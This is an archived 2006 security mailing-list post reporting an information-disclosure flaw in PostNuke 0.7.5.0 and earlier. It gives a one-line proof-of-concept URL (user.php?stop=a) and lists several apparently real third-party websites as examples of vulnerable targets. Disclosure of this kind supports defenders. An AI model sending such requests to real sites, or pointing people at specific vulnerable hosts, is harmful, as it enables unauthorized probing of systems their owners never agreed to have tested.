Vulnerability in PostNuke

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Vulnerability in PostNuke

Subject: Vulnerability in PostNuke
Date: Wed, 22 Nov 2006 00:34:16 +0200
From: suppressed

Error PostNuke in the variable stop which can be exploited by maliciouspeople to disclose system information. Luckily the vulnerabilityaffects to the 0.7.5.0 version and minors.


POC:
http://www.[web-with-PostNuke].com/user.php?stop=a (no numeric value)
Example:
http://www.dev-postnuke.com/user.php?stop=a
http://www.americavivetv.com/user.php?stop=a
http://www.ciberpsique.net/user.php?stop=a

http://www.bonsaiabm.com/user.php?stop=ahttp://www.elrincondejada.net/user.php?stop=ahttp://www.salsa.org.pl/user.php?stop=ahttp://www.choco.org/user.php?stop=a



by rMrGvG

http://SNI-LABS.com
since 1998

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Prev by Date: VMSA-2006-0010 - SSL sessions not authenticated by VC Clients
Next by Date: Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
Previous by thread: VMSA-2006-0010 - SSL sessions not authenticated by VC Clients
Next by thread: Advisory: Seditio <= 1.10 Remote SQL Injection Vulnerability.
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.